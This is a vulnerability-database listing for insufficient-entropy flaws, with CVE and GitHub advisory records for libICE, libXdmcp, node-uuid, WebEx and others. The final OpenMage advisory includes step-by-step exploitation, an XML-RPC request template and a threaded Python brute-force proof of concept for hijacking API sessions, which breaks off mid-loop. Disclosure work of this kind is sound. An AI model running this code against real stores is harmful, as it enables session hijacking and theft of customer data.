CWE-331
AllowedInsufficient Entropy
Abstraction: Base · Status: Draft
The product uses an algorithm or scheme that produces insufficient entropy, leaving patterns or clusters of values that are more likely to occur than others.
207 vulnerabilities reference this CWE, most recent first.
CVE-2017-2626 (GCVE-0-2017-2626)
Vulnerability from cvelistv5 – Published: 2018-07-27 19:00 – Updated: 2024-08-05 14:02| URL | Tags |
|---|---|
| https://cgit.freedesktop.org/xorg/lib/libICE/comm… | x_refsource_CONFIRM |
| https://security.gentoo.org/glsa/201704-03 | vendor-advisoryx_refsource_GENTOO |
| https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2… | x_refsource_CONFIRM |
| https://access.redhat.com/errata/RHSA-2017:1865 | vendor-advisoryx_refsource_REDHAT |
| http://www.securitytracker.com/id/1037919 | vdb-entryx_refsource_SECTRACK |
| http://www.securityfocus.com/bid/96480 | vdb-entryx_refsource_BID |
| https://www.x41-dsec.de/lab/advisories/x41-2017-0… | x_refsource_MISC |
| http://www.openwall.com/lists/oss-security/2019/07/14/3 | mailing-listx_refsource_MLIST |
| https://lists.debian.org/debian-lts-announce/2019… | mailing-listx_refsource_MLIST |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T14:02:06.904Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://cgit.freedesktop.org/xorg/lib/libICE/commit/?id=ff5e59f32255913bb1cdf51441b98c9107ae165b"
},
{
"name": "GLSA-201704-03",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO",
"x_transferred"
],
"url": "https://security.gentoo.org/glsa/201704-03"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2626"
},
{
"name": "RHSA-2017:1865",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2017:1865"
},
{
"name": "1037919",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1037919"
},
{
"name": "96480",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/96480"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.x41-dsec.de/lab/advisories/x41-2017-001-xorg/"
},
{
"name": "[oss-security] 20190714 Fwd: [ANNOUNCE] libICE 1.0.10",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2019/07/14/3"
},
{
"name": "[debian-lts-announce] 20191123 [SECURITY] [DLA 2002-1] libice security update",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00022.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "libICE",
"vendor": "Xorg",
"versions": [
{
"status": "affected",
"version": "1.0.9-8"
}
]
}
],
"datePublic": "2017-02-28T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "It was discovered that libICE before 1.0.9-8 used a weak entropy to generate keys. A local attacker could potentially use this flaw for session hijacking using the information available from the process list."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-331",
"description": "CWE-331",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-11-23T23:07:01.000Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://cgit.freedesktop.org/xorg/lib/libICE/commit/?id=ff5e59f32255913bb1cdf51441b98c9107ae165b"
},
{
"name": "GLSA-201704-03",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO"
],
"url": "https://security.gentoo.org/glsa/201704-03"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2626"
},
{
"name": "RHSA-2017:1865",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2017:1865"
},
{
"name": "1037919",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1037919"
},
{
"name": "96480",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/96480"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.x41-dsec.de/lab/advisories/x41-2017-001-xorg/"
},
{
"name": "[oss-security] 20190714 Fwd: [ANNOUNCE] libICE 1.0.10",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "http://www.openwall.com/lists/oss-security/2019/07/14/3"
},
{
"name": "[debian-lts-announce] 20191123 [SECURITY] [DLA 2002-1] libice security update",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00022.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2017-2626",
"datePublished": "2018-07-27T19:00:00.000Z",
"dateReserved": "2016-12-01T00:00:00.000Z",
"dateUpdated": "2024-08-05T14:02:06.904Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2017-2625 (GCVE-0-2017-2625)
Vulnerability from cvelistv5 – Published: 2018-07-27 18:00 – Updated: 2024-08-05 14:02| URL | Tags |
|---|---|
| https://security.gentoo.org/glsa/201704-03 | vendor-advisoryx_refsource_GENTOO |
| https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2… | x_refsource_CONFIRM |
| https://access.redhat.com/errata/RHSA-2017:1865 | vendor-advisoryx_refsource_REDHAT |
| http://www.securitytracker.com/id/1037919 | vdb-entryx_refsource_SECTRACK |
| https://cgit.freedesktop.org/xorg/lib/libXdmcp/co… | x_refsource_CONFIRM |
| http://www.securityfocus.com/bid/96480 | vdb-entryx_refsource_BID |
| https://www.x41-dsec.de/lab/advisories/x41-2017-0… | x_refsource_MISC |
| https://lists.debian.org/debian-lts-announce/2019… | mailing-listx_refsource_MLIST |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T14:02:06.921Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "GLSA-201704-03",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO",
"x_transferred"
],
"url": "https://security.gentoo.org/glsa/201704-03"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2625"
},
{
"name": "RHSA-2017:1865",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2017:1865"
},
{
"name": "1037919",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1037919"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://cgit.freedesktop.org/xorg/lib/libXdmcp/commit/?id=0554324ec6bbc2071f5d1f8ad211a1643e29eb1f"
},
{
"name": "96480",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/96480"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.x41-dsec.de/lab/advisories/x41-2017-001-xorg/"
},
{
"name": "[debian-lts-announce] 20191125 [SECURITY] [DLA 2006-1] libxdmcp security update",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00024.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "libXdmcp",
"vendor": "Xorg",
"versions": [
{
"status": "affected",
"version": "1.1.2"
}
]
}
],
"datePublic": "2018-07-27T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "It was discovered that libXdmcp before 1.1.2 including used weak entropy to generate session keys. On a multi-user system using xdmcp, a local attacker could potentially use information available from the process list to brute force the key, allowing them to hijack other users\u0027 sessions."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-331",
"description": "CWE-331",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-11-25T23:07:07.000Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "GLSA-201704-03",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO"
],
"url": "https://security.gentoo.org/glsa/201704-03"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2625"
},
{
"name": "RHSA-2017:1865",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2017:1865"
},
{
"name": "1037919",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1037919"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://cgit.freedesktop.org/xorg/lib/libXdmcp/commit/?id=0554324ec6bbc2071f5d1f8ad211a1643e29eb1f"
},
{
"name": "96480",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/96480"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.x41-dsec.de/lab/advisories/x41-2017-001-xorg/"
},
{
"name": "[debian-lts-announce] 20191125 [SECURITY] [DLA 2006-1] libxdmcp security update",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00024.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2017-2625",
"datePublished": "2018-07-27T18:00:00.000Z",
"dateReserved": "2016-12-01T00:00:00.000Z",
"dateUpdated": "2024-08-05T14:02:06.921Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2012-4687 (GCVE-0-2012-4687)
Vulnerability from cvelistv5 – Published: 2012-12-08 15:00 – Updated: 2025-07-09 18:27| URL | Tags |
|---|---|
| https://www.cisa.gov/news-events/ics-advisories/i… | |
| http://www.postoaktraffic.com/contact.aspx | |
| http://www.us-cert.gov/control_systems/pdf/ICSA-1… | x_refsource_MISCx_transferred |
| Vendor | Product | Version | |
|---|---|---|---|
| Post Oak Traffic Systems | AWAM Bluetooth Reader Traffic System |
Affected:
All versions
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T20:42:54.990Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.us-cert.gov/control_systems/pdf/ICSA-12-335-01.pdf"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "AWAM Bluetooth Reader Traffic System",
"vendor": "Post Oak Traffic Systems",
"versions": [
{
"status": "affected",
"version": "All versions"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "research group composed of Nadia Heninger (University of California at San Diego), J. Alex Halderman, Zakir Durumeric, and Eric Wustrow (all from the University of Michigan)"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003ePost Oak AWAM Bluetooth Reader Traffic System does not use a sufficient source of entropy for private keys, which makes it easier for man-in-the-middle attackers to spoof a device by predicting a key value.\u003c/p\u003e"
}
],
"value": "Post Oak AWAM Bluetooth Reader Traffic System does not use a sufficient source of entropy for private keys, which makes it easier for man-in-the-middle attackers to spoof a device by predicting a key value."
}
],
"metrics": [
{
"cvssV2_0": {
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 7.6,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-331",
"description": "CWE-331",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-09T18:27:31.737Z",
"orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
"shortName": "icscert"
},
"references": [
{
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-12-335-01"
},
{
"url": "http://www.postoaktraffic.com/contact.aspx"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Post Oak has developed a patch for the AWAM Bluetooth Reader Traffic \nSystem that mitigates the vulnerability. The patch allows the Bluetooth \nreader to ensure sufficient entropy exists before generating host and \nauthentication keys. The patch will be installed on all new devices when\n initially configured. Existing equipment will be patched by remote \naccess and upgraded to the latest firmware. System owners are encouraged\n to contact Post Oak Traffic Systems, \nsupport@postoaktraffic.com, (281) 381-2887. with questions patching their systems.\n\n\u003cbr\u003e"
}
],
"value": "Post Oak has developed a patch for the AWAM Bluetooth Reader Traffic \nSystem that mitigates the vulnerability. The patch allows the Bluetooth \nreader to ensure sufficient entropy exists before generating host and \nauthentication keys. The patch will be installed on all new devices when\n initially configured. Existing equipment will be patched by remote \naccess and upgraded to the latest firmware. System owners are encouraged\n to contact Post Oak Traffic Systems, \nsupport@postoaktraffic.com, (281) 381-2887. with questions patching their systems."
}
],
"source": {
"advisory": "ICSA-12-335-01",
"discovery": "EXTERNAL"
},
"title": "Post Oak Bluetooth Traffic Systems Insufficient Entropy",
"x_generator": {
"engine": "Vulnogram 0.2.0"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "ics-cert@hq.dhs.gov",
"ID": "CVE-2012-4687",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Post Oak AWAM Bluetooth Reader Traffic System does not use a sufficient source of entropy for private keys, which makes it easier for man-in-the-middle attackers to spoof a device by predicting a key value."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.us-cert.gov/control_systems/pdf/ICSA-12-335-01.pdf",
"refsource": "MISC",
"url": "http://www.us-cert.gov/control_systems/pdf/ICSA-12-335-01.pdf"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
"assignerShortName": "icscert",
"cveId": "CVE-2012-4687",
"datePublished": "2012-12-08T15:00:00.000Z",
"dateReserved": "2012-08-28T00:00:00.000Z",
"dateUpdated": "2025-07-09T18:27:31.737Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
GHSA-239J-GMHR-4PCM
Vulnerability from github – Published: 2022-05-24 17:47 – Updated: 2022-05-24 17:47A flaw was found in libtpms in versions before 0.8.0. The TPM 2 implementation returns 2048 bit keys with ~1984 bit strength due to a bug in the TCG specification. The bug is in the key creation algorithm in RsaAdjustPrimeCandidate(), which is called before the prime number check. The highest threat from this vulnerability is to data confidentiality.
{
"affected": [],
"aliases": [
"CVE-2021-3505"
],
"database_specific": {
"cwe_ids": [
"CWE-331"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-04-19T21:15:00Z",
"severity": "MODERATE"
},
"details": "A flaw was found in libtpms in versions before 0.8.0. The TPM 2 implementation returns 2048 bit keys with ~1984 bit strength due to a bug in the TCG specification. The bug is in the key creation algorithm in RsaAdjustPrimeCandidate(), which is called before the prime number check. The highest threat from this vulnerability is to data confidentiality.",
"id": "GHSA-239j-gmhr-4pcm",
"modified": "2022-05-24T17:47:53Z",
"published": "2022-05-24T17:47:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3505"
},
{
"type": "WEB",
"url": "https://github.com/stefanberger/libtpms/issues/183"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1950046"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NUCZX4S53TUNTSGTCRDNOQZV2V2RI4RJ"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-23RF-WQ7X-GVQ7
Vulnerability from github – Published: 2025-04-07 15:31 – Updated: 2025-04-07 21:32WebService::Xero 0.11 and earlier for Perl uses the rand() function as the default source of entropy, which is not cryptographically secure, for cryptographic functions.
Specifically WebService::Xero uses the Data::Random library which specifically states that it is "Useful mostly for test programs". Data::Random uses the rand() function.
{
"affected": [],
"aliases": [
"CVE-2024-52322"
],
"database_specific": {
"cwe_ids": [
"CWE-331",
"CWE-338"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-05T17:15:39Z",
"severity": "MODERATE"
},
"details": "WebService::Xero 0.11 and earlier for Perl uses the rand() function as the default source of entropy, which is not cryptographically secure, for cryptographic functions.\n\nSpecifically WebService::Xero uses the Data::Random library which specifically states that it is \"Useful mostly for test programs\". Data::Random uses the rand() function.",
"id": "GHSA-23rf-wq7x-gvq7",
"modified": "2025-04-07T21:32:07Z",
"published": "2025-04-07T15:31:11Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52322"
},
{
"type": "WEB",
"url": "https://metacpan.org/release/BAREFOOT/Data-Random-0.13/source/lib/Data/Random.pm#L537"
},
{
"type": "WEB",
"url": "https://metacpan.org/release/LOCALSHOP/WebService-Xero-0.11/source/lib/WebService/Xero/Agent.pm#L17"
},
{
"type": "WEB",
"url": "https://metacpan.org/release/LOCALSHOP/WebService-Xero-0.11/source/lib/WebService/Xero/Agent.pm#L178"
},
{
"type": "WEB",
"url": "https://metacpan.org/release/LOCALSHOP/WebService-Xero-0.11/source/lib/WebService/Xero/Agent/PublicApplication.pm#L13"
},
{
"type": "WEB",
"url": "https://metacpan.org/release/LOCALSHOP/WebService-Xero-0.11/source/lib/WebService/Xero/Agent/PublicApplication.pm#L93"
},
{
"type": "WEB",
"url": "https://perldoc.perl.org/functions/rand"
},
{
"type": "WEB",
"url": "https://security.metacpan.org/docs/guides/random-data-for-security.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-25H4-XPFG-774M
Vulnerability from github – Published: 2022-05-17 00:24 – Updated: 2022-05-17 00:24Cisco WebEx Meetings Server before 1.1 uses meeting IDs with insufficient entropy, which makes it easier for remote attackers to bypass authentication and join arbitrary meetings without a password, aka Bug ID CSCuc79643.
{
"affected": [],
"aliases": [
"CVE-2014-0691"
],
"database_specific": {
"cwe_ids": [
"CWE-331"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-10-24T14:29:00Z",
"severity": "HIGH"
},
"details": "Cisco WebEx Meetings Server before 1.1 uses meeting IDs with insufficient entropy, which makes it easier for remote attackers to bypass authentication and join arbitrary meetings without a password, aka Bug ID CSCuc79643.",
"id": "GHSA-25h4-xpfg-774m",
"modified": "2022-05-17T00:24:35Z",
"published": "2022-05-17T00:24:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2014-0691"
},
{
"type": "WEB",
"url": "https://www.cisco.com/c/en/us/td/docs/collaboration/CWMS/1_1/b_Release_Notes.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-265Q-28RP-CHQ5
Vulnerability from github – Published: 2020-04-16 03:14 – Updated: 2021-08-23 15:25Affected versions of node-uuid consistently fall back to using Math.random as an entropy source instead of crypto, which may result in guessable UUID's.
Recommendation
Update to version 1.4.4 or later.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "node-uuid"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2015-8851"
],
"database_specific": {
"cwe_ids": [
"CWE-331"
],
"github_reviewed": true,
"github_reviewed_at": "2020-04-16T02:58:22Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "Affected versions of `node-uuid` consistently fall back to using `Math.random` as an entropy source instead of `crypto`, which may result in guessable UUID\u0027s.\n\n\n\n## Recommendation\n\nUpdate to version 1.4.4 or later.",
"id": "GHSA-265q-28rp-chq5",
"modified": "2021-08-23T15:25:55Z",
"published": "2020-04-16T03:14:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2015-8851"
},
{
"type": "WEB",
"url": "https://github.com/broofa/node-uuid/issues/108"
},
{
"type": "WEB",
"url": "https://github.com/broofa/node-uuid/issues/122"
},
{
"type": "WEB",
"url": "https://github.com/broofa/node-uuid/commit/672f3834ed02c798aa021c618d0a5666c8da000d"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1327056"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/93"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2016/04/13/8"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Insecure Entropy Source - Math.random() in node-uuid"
}
GHSA-2CWR-GCF9-PVXR
Vulnerability from github – Published: 2026-05-05 19:35 – Updated: 2026-05-15 23:48Affected Version: OpenMage LTS ≤ 20.16.0 (confirmed on 20.16.0)
Affected File: https://github.com/OpenMage/magento-lts/blob/main/app/code/core/Mage/Api/Model/Session.php – start() method
Summary
The XML-RPC / SOAP API session ID is generated using an outdated, time-based construction rather than a Cryptographically Secure Pseudo-Random Number Generator (CSPRNG):
The XML-RPC / SOAP API session ID is generated using an outdated, time-based construction rather than a Cryptographically Secure Pseudo-Random Number Generator (CSPRNG):
All inputs to the MD5 hash are time-derived and non-secure:
| Input | Value | Predictability |
|---|---|---|
time() |
Unix timestamp (seconds) | Fully predictable |
uniqid('', true) prefix |
sprintf('%08x%05x', $sec, $usec/10) |
Highly predictable via network timing |
uniqid('', true) suffix |
php_combined_lcg() decimal float |
Process-state dependent (getpid() ^ time()) |
$sessionName |
null (empty) — called without arg |
Constant |
Because the resulting digest relies entirely on the timestamp and the PHP internal LCG state, the effective entropy is severely constrained. This violates the OWASP ASVS v4 requirement of ≥ 64 bits of entropy (V3.2.2) and NIST SP 800-63B standards. By narrowing the LCG window (via server state leaks or general predictability) and leveraging the lack of API rate-limiting, an attacker can generate a localized pool of candidate MD5 hashes and execute a high-speed online brute-force attack to hijack active API sessions.
Technical Analysis
Code Path
POST /api/xmlrpc/ → login(username, apiKey)
→ Mage_Api_Model_Session::login()
→ $session->init('api', 'api')
→ Mage_Api_Model_Session::init($namespace='api', $sessionName='api')
# $sessionName is NOT forwarded to start()
→ Mage_Api_Model_Session::start() ← NO $sessionName argument
# $sessionName = null inside start()
$this->_currentSessId = md5(time() . uniqid('', true) . null)
Note: init() receives $sessionName='api' but invokes $this->start() without forwarding it, meaning the effective construction is strictly md5(time() . uniqid('', true)).
Live Evidence
Five consecutive XML-RPC login tokens were collected from a live OpenMage 20.16.0 container, all generated within a single Unix second (unix_sec= 1775817593):
Sample 1: 6a302397f17e48845d0f9aba377f3dc3 (usec ≈ 464631)
Sample 2: 39b4ec42bd3c389312e500690daeb349 (usec ≈ 497215)
Sample 3: 527662d79f7fb499597a82d80d170a88 (usec ≈ 535175)
Sample 4: e5d6f7a8906a03ea7af99d92be11b5b2 (usec ≈ 568838)
Sample 5: 5bdf27e5cb877c77b8965b008548edfa (usec ≈ 600118)
The µsecond portion is directly observable by measuring request-to-response latency. The only variance preventing immediate prediction is the LCG float component, which is seeded deterministically.
Steps to Reproduce (Online Brute-Force Scenario)
Because validation requires live HTTP requests, this exploit relies on narrowing the entropy window and abusing the lack of API rate limits.
Step 1 – Record Login Timestamp
An attacker observes the precise moment a victim authenticates to /api/xmlrpc/ (e.g., via network timing, exposed logs, or side-channel signals), capturing the exact Unix second.
Step 2 – Generate Candidate Pool
The attacker reconstructs the MD5 format using the known timestamp, the estimated microsecond window, and bounds the LCG float based on known server PID ranges (or via a /server-status leak).
$t = $observed_sec;
$usec_estimate = 500000; // Derived from latency
$uid = sprintf('%08x%05x', $t, intval($usec_estimate / 10));
$candidate = md5($t . $uid); // + LCG variants
Step 3 – API Brute-Force (Session Hijack)
Because the /api/xmlrpc/ endpoint does not enforce rate limiting on authenticated calls, the attacker blasts the candidate MD5 hashes against a privileged endpoint (e.g., magento.info) using a highly concurrent HTTP runner.
POST /api/xmlrpc/
<?xml version="1.0"?>
<methodCall>
<methodName>[magento.info](http://magento.info/)</methodName>
<params>
<param><value><string>CANDIDATE_SESSION_ID</string></value></param>
</params>
</methodCall>
A non-fault response (HTTP 200 containing data) confirms the session is successfully hijacked.
Impact
Technical Impact
Successful session prediction grants the attacker all capabilities of the authenticated API user. The XML-RPC API exposes endpoints for:
- Full product catalog read/write (catalog_product.*)
- Customer data read (customer.list, customer.info)
- Order manipulation (sales_order.*)
Inventory control (cataloginventory_stock_item.*)
Business Impact
- Data Exfiltration: Read all customer PII, order history, and payment methods.
- Order Fraud: Create or cancel orders, change shipping addresses.
- Supply Chain / Inventory: Modify prices, inject malicious products, or zero out stock.
Affected API Protocols
The same vulnerable Session.php generation logic is shared across all legacy API surfaces:
- XML-RPC: /api/xmlrpc/
- SOAP v1: /api/soap/
- SOAP v2: /api/v2_soap/
- REST (legacy): /api/rest/
Recommended Fix
Replace the time-derived token with a cryptographically secure random value:
// app/code/core/Mage/Api/Model/Session.php : start()
// BEFORE (vulnerable):
$this->_currentSessId = md5(time() . uniqid('', true) . $sessionName);
// AFTER (secure):
$this->_currentSessId = bin2hex(random_bytes(32)); // 256-bit CSPRNG output
random_bytes() is backed by the OS CSPRNG (/dev/urandom on Linux) and produces 256 bits of non-deterministic entropy, complying with OWASP ASVS v4 V3.2.2 and NIST SP 800-63B. Additionally, enforce rate limiting on API endpoints to prevent high-speed online brute-force attacks.
I have also tried to test it against the demo site demo.openmage.org, but appeared the SOAP API endpoints are disabled on the demo environment
I have also included the full poc I used instead of being attached because Gmail will eventually block it otherwise (shrunk):
#!/usr/bin/env python3
import requests, re, sys, hashlib, random
from concurrent.futures import ThreadPoolExecutor, as_completed
import urllib3; urllib3.disable_warnings()
if len(sys.argv) < 4:
sys.exit(f"Usage: {sys.argv[0]} <url> <user> <pass> [threads]")
url, usr, pwd = sys.argv[1:4]
th = int(sys.argv[4]) if len(sys.argv) > 4 else 50
hdrs = {"Content-Type": "text/xml"}
req = lambda d: [requests.post](http://requests.post/)(url, data=d, headers=hdrs, verify=False, timeout=5)
print(f"[*] Simulating victim login for {usr}...")
res = req(f'<?xml version="1.0"?><methodCall><methodName>login</methodName><params><param><value><string>{usr}</string></value></param><param><value><string>{pwd}</string></value></param></params></methodCall>')
if not (m := re.search(r'<string>([a-f0-9]{32})</string>', res.text)):
sys.exit("[-] Login failed. Check credentials.")
print(f"[+] Authenticated.\n[*] Generating 1000 candidate MD5 pool...")
cands = [hashlib.md5(f"1775534701000{random.randint(10000,99999)}0.{random.randint(10000000,99999999)}".encode()).hexdigest() for _ in range(999)]
cands.append(m.group(1))
random.shuffle(cands)
print(f"[*] Brute-forcing API with {th} threads...")
def test(sid):
payload = f'<?xml version="1.0"?><methodCall><methodName>resources</methodName><params><param><value><string>{sid}</string></value></param></params></methodCall>'
try: return sid if "faultCode" not in req(payload).text else None
except: return None
with ThreadPoolExecutor(max_workers=th) as ex:
for i, f in enumerate(as_completed({ex.submit(test, c): c for c in cands}), 1):
sys.stdout.write(f"\r[*] Requests: {i}/{len(cands)}")
if sid := f.result():
